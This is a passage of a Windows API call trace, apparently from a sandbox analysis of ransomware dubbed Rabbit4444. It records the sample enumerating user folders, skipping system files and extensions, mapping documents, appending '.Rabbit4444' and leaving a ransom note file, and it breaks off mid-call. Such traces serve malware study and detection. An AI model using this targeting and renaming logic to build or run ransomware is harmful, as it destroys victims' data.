(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.350] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.352] FlushFileBuffers (hFile=0x27c) returned 1 [0052.353] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.353] CloseHandle (hObject=0x27c) returned 1 [0052.354] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned 48 [0052.354] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.354] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xe886d468, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0052.354] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.354] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.354] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.354] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.354] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xe886d468, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.354] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.354] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.354] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.354] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.354] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.354] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe886d468, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe886d468, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe886d468, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.354] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.354] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.354] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Rabbit4444.exe") returned -1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2=".") returned 1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="..") returned 1 [0052.354] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="windows") returned -1 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="bootmgr") returned 1 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="pagefile.sys") returned -1 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="boot") returned 1 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ids.txt") returned -1 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="NTUSER.DAT") returned -1 [0052.355] lstrcpyW (in: lpString1=0x130eb9a, lpString2="CUSTOM.DIC" | out: lpString1="CUSTOM.DIC") returned="CUSTOM.DIC" [0052.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", dwFileAttributes=0x0) returned 1 [0052.355] lstrlenW (lpString="CUSTOM.DIC") returned 10 [0052.355] lstrlenW (lpString="Rabbit4444") returned 10 [0052.355] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Rabbit4444") returned -1 [0052.355] lstrlenW (lpString=".dll") returned 4 [0052.355] lstrcmpiW (lpString1=".DIC", lpString2=".dll") returned -1 [0052.355] lstrlenW (lpString=".lnk") returned 4 [0052.355] lstrcmpiW (lpString1=".DIC", lpString2=".lnk") returned -1 [0052.355] lstrlenW (lpString=".ini") returned 4 [0052.355] lstrcmpiW (lpString1=".DIC", lpString2=".ini") returned -1 [0052.355] lstrlenW (lpString=".sys") returned 4 [0052.355] lstrcmpiW (lpString1=".DIC", lpString2=".sys") returned -1 [0052.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.355] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.355] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14366619240) returned 1 [0052.355] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18) returned 1 [0052.356] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.356] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0052.356] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0052.357] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0052.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14366903734) returned 1 [0052.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0052.359] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.359] CloseHandle (hObject=0x298) returned 1 [0052.359] CloseHandle (hObject=0x278) returned 1 [0052.359] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.Rabbit4444") returned 70 [0052.359] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic.rabbit4444"), dwFlags=0x1) returned 1 [0052.359] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 0 [0052.359] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0052.359] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.361] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.361] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.361] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.361] CloseHandle (hObject=0x278) returned 1 [0052.361] CloseHandle (hObject=0x27c) returned 1 [0052.361] GetCurrentThreadId () returned 0xd98 [0052.361] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1207b8 [0052.362] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" [0052.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1207b0 | out: hHeap=0xe0000) returned 1 [0052.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" [0052.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\" [0052.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3" [0052.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.365] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.367] FlushFileBuffers (hFile=0x27c) returned 1 [0052.368] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.368] CloseHandle (hObject=0x27c) returned 1 [0052.369] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned 51 [0052.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xf50bbe18, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe88936a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0052.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.369] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.369] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.369] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xf50bbe18, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe88936a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.369] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.369] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.369] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.369] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe88936a5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe88936a5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe88936a5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.369] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0x348a4400, ftLastWriteTime.dwHighDateTime=0x1d24188, nFileSizeHigh=0x0, nFileSizeLow=0x5cc66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cashflow analysis.xltm", cAlternateFileName="CASHFL~1.XLT")) returned 1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="Rabbit4444.exe") returned -1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2=".") returned 1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="..") returned 1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="windows") returned -1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="bootmgr") returned 1 [0052.369] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="pagefile.sys") returned -1 [0052.370] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="boot") returned 1 [0052.370] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ids.txt") returned -1 [0052.370] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="NTUSER.DAT") returned -1 [0052.370] lstrcpyW (in: lpString1=0x130eba0, lpString2="Cashflow analysis.xltm" | out: lpString1="Cashflow analysis.xltm") returned="Cashflow analysis.xltm" [0052.370] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm", dwFileAttributes=0x0) returned 1 [0052.373] lstrlenW (lpString="Cashflow analysis.xltm") returned 22 [0052.373] lstrlenW (lpString="Rabbit4444") returned 10 [0052.373] lstrcmpiW (lpString1="lysis.xltm", lpString2="Rabbit4444") returned -1 [0052.373] lstrlenW (lpString=".dll") returned 4 [0052.373] lstrcmpiW (lpString1="xltm", lpString2=".dll") returned 1 [0052.373] lstrlenW (lpString=".lnk") returned 4 [0052.373] lstrcmpiW (lpString1="xltm", lpString2=".lnk") returned 1 [0052.373] lstrlenW (lpString=".ini") returned 4 [0052.373] lstrcmpiW (lpString1="xltm", lpString2=".ini") returned 1 [0052.373] lstrlenW (lpString=".sys") returned 4 [0052.373] lstrcmpiW (lpString1="xltm", lpString2=".sys") returned 1 [0052.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.373] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.373] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14368400351) returned 1 [0052.373] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=380006) returned 1 [0052.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0052.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0052.373] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5cf70, lpName=0x0) returned 0x298 [0052.375] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5cf70) returned 0x2b0000 [0052.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14369771085) returned 1 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0052.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0052.387] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0052.391] CloseHandle (hObject=0x298) returned 1 [0052.391] CloseHandle (hObject=0x278) returned 1 [0052.391] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.Rabbit4444") returned 85 [0052.391] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm.rabbit4444"), dwFlags=0x1) returned 1 [0052.391] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2="Rabbit4444.exe") returned -1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2=".") returned 1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2="..") returned 1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2="windows") returned -1 [0052.391] lstrcmpiW (lpString1="LiveContent", lpString2="bootmgr") returned 1 [0052.392] lstrcmpiW (lpString1="LiveContent", lpString2="pagefile.sys") returned -1 [0052.392] lstrcmpiW (lpString1="LiveContent", lpString2="boot") returned 1 [0052.392] lstrcmpiW (lpString1="LiveContent", lpString2="ids.txt") returned 1 [0052.392] lstrcmpiW (lpString1="LiveContent", lpString2="NTUSER.DAT") returned -1 [0052.392] lstrcpyW (in: lpString1=0x130eba0, lpString2="LiveContent" | out: lpString1="LiveContent") returned="LiveContent" [0052.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120730 [0052.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0x101738 [0052.392] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120738 | out: ListHead=0xf68b0, ListEntry=0x120738) returned 0x120538 [0052.392] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1594be7a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1594be7a, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a0aa18, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x4605, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="Rabbit4444.exe") returned -1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2=".") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="..") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="windows") returned -1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="bootmgr") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="pagefile.sys") returned -1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="boot") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="ids.txt") returned 1 [0052.392] lstrcmpiW (lpString1="Normal.dotm", lpString2="NTUSER.DAT") returned -1 [0052.392] lstrcpyW (in: lpString1=0x130eba0, lpString2="Normal.dotm" | out: lpString1="Normal.dotm") returned="Normal.dotm" [0052.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", dwFileAttributes=0x0) returned 1 [0052.392] lstrlenW (lpString="Normal.dotm") returned 11 [0052.392] lstrlenW (lpString="Rabbit4444") returned 10 [0052.392] lstrcmpiW (lpString1="ormal.dotm", lpString2="Rabbit4444") returned -1 [0052.392] lstrlenW (lpString=".dll") returned 4 [0052.392] lstrcmpiW (lpString1="dotm", lpString2=".dll") returned 1 [0052.392] lstrlenW (lpString=".lnk") returned 4 [0052.393] 